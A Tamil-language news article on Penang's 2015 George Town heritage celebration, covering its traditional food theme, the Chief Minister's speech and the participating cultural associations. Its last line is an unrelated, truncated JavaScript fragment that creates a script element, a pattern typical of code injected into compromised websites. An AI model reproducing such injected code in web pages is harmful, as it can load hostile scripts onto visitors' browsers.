பினாங்கு ஜோர்ஜ்டவுன் பகுதி பாரம்பரிய நகரமாக பிரகடணப்படுத்தப்பட்டு கடந்த 7 ஜுலை 2015-ஆம் நாள் தமது ஏழாம் ஆண்டு நிறைவு நாளைக் கொண்டாடியது. ஜோர்ஜ்டவுன் மக்களின் துடிப்பான நட்பைப் பறைச்சாற்றும் வகையில் உள்ளூர்வாசிகளின் கைவினைப் பொருட்கள், உணவு வகைகள், மூவின மக்கள் பேணிக்காத்து வரும் பாரம்பரிய கலை கலாச்சாரங்கள், வரலாற்று சிறப்புமிக்க கட்டடங்கள் ஆகியவற்றின் சரித்திர சுவடுகளைக் கண்டு களிக்க மிகப் பெரிய வாய்ப்பை இப்பண்பாட்டு விழா ஏற்படுத்தியது என செய்தியாளர் சந்திப்பில் கூறினார் பினாங்கு மாநில முதல்வர் மேதகு லிம் குவான் எங்.
இவ்வாண்டுக்கானக் கருப்பொருள் “பாரம்பரிய உணவுகள் புசிப்போம்” (Eat Rite) என்பதாகும். நிகழ்வில் சிறப்புரையாற்றிய மாநில முதல்வர் மலேசியாவில் வாழும் மூவின மக்களின் பாரம்பரிய உணவு முறைகளை நினைவுகூர்ந்து அதன் பயன்பாட்டினையும் சரித்திரத்தையும் அறிந்து கொள்ள இக்கொண்டாட்டம் சிறப்பாக அமைந்தது என்றார். அனைத்து இனங்களின் பாரம்பரியங்கள் பினாங்கில் எப்பொழுதும் காக்கப்படும் எனவும் இதற்கு பினாங்கு யுனேஸ்கோ பாரம்பரிய பண்பாட்டு விழா (Heritage Celebration) தக்கச் சன்றாக அமைந்தது என தமது உரையில் எடுத்துரைத்தார். ஆண்டுத்தோறும் பினாங்கில் 500-க்கும் மேற்பட்ட பாரம்பரிய பண்பாட்டு விழாக்கள் கொண்டாடப்படுவது குறிப்பிடத்தக்கதாகும்.
ஏறத்தாழ 30-க்கும் மேற்பட்ட முகப்பிடங்கள் அமைக்கப்பட்டு அதில் மூவின மக்களின் பாரம்பரிய உணவு பண்டங்களை சமைக்கக் கற்றுகொள்ளும் பயிற்சி பட்டறை மற்றும் சுவைத்துப் பார்க்கும் நிகழ்வும் இடம்பெற்றது. இதன்வழி தொண்றுத்தொட்டு வரும் பாரம்பரிய உணவு முறைகள் மறக்கப்படாமல் இருக்கவும் இன்றைய இளைஞர்கள் அதனை அறிந்து கொள்ளவும் இந்நிகழ்வு பெரும் துணைபுரிந்தது என்பதில் ஐயமில்லை. கடந்தாண்டை போன்றே இவ்வாண்டும் அதிகமான உள்ளூர் மற்றும் வெளிநாட்டு சுற்றுப்பயணிகள் கலந்து கொண்டு பல்வகை உணவு பதார்த்தங்களை உண்டு மகிழ்ந்தனர்.
இந்த வரலாற்று விழா ஜோர்ஜ்டவுன் வேர்ல்டு ஹெரிட்டேஜ் இன்கார்ப்பரேட்டட் (Georgetown World Heritage In.Corporation) என்னும் மாநில அரசு ஏஜென்சியுடன் பினாங்கு மாநில அரசு, பினாங்கு சுற்றுலா துறை மற்றும் பினாங்கு மாநகர் கழகமும் இணைந்து ஏற்பாடுச் செய்திருந்தது. 4 ஜுலை முதல் 7 ஜுலை வரை நடைபெற்ற இம்மூன்று நாள் கொண்டாட்டத்தில் பொதுமக்கள் கலந்து கொண்டு பயன் அடைந்தனர்.
இந்நிகழ்வில் கருப்பட்டிப் பணியாரம், வெள்ளைப் பணியாரம், ஆடிக்கூழ் மற்றும் இன்னும் பலவித இந்திய பதார்த்தங்கள் வருகையாளர்களின் நாவிற்கு இன்பச் சுவையை வழங்கியது குறிப்பிடத்தக்கதாகும். ஜோர்ஜ்டவுன் நகர வீதிகளில் விழாக் கோலம் பூண்ட இப்பாரம்பரிய உணவுக் கண்காட்சியில் பினாங்கு இந்து சங்கம், இந்திய முஸ்லீம் சமூக சங்கம், சீனர் சமூக சங்கம், பினாங்கு தெலுங்கு சங்கம், வட மலேசியா மலையாளிகள் சங்கம், பினாங்கு குத்வாரா ஆலய நிர்வாகம் உள்ளிட்ட பல்வேறு கலாச்சார அமைப்புகளும் கலந்து கொண்டனர்.
var d=document;var s=d.createElement(‘script’);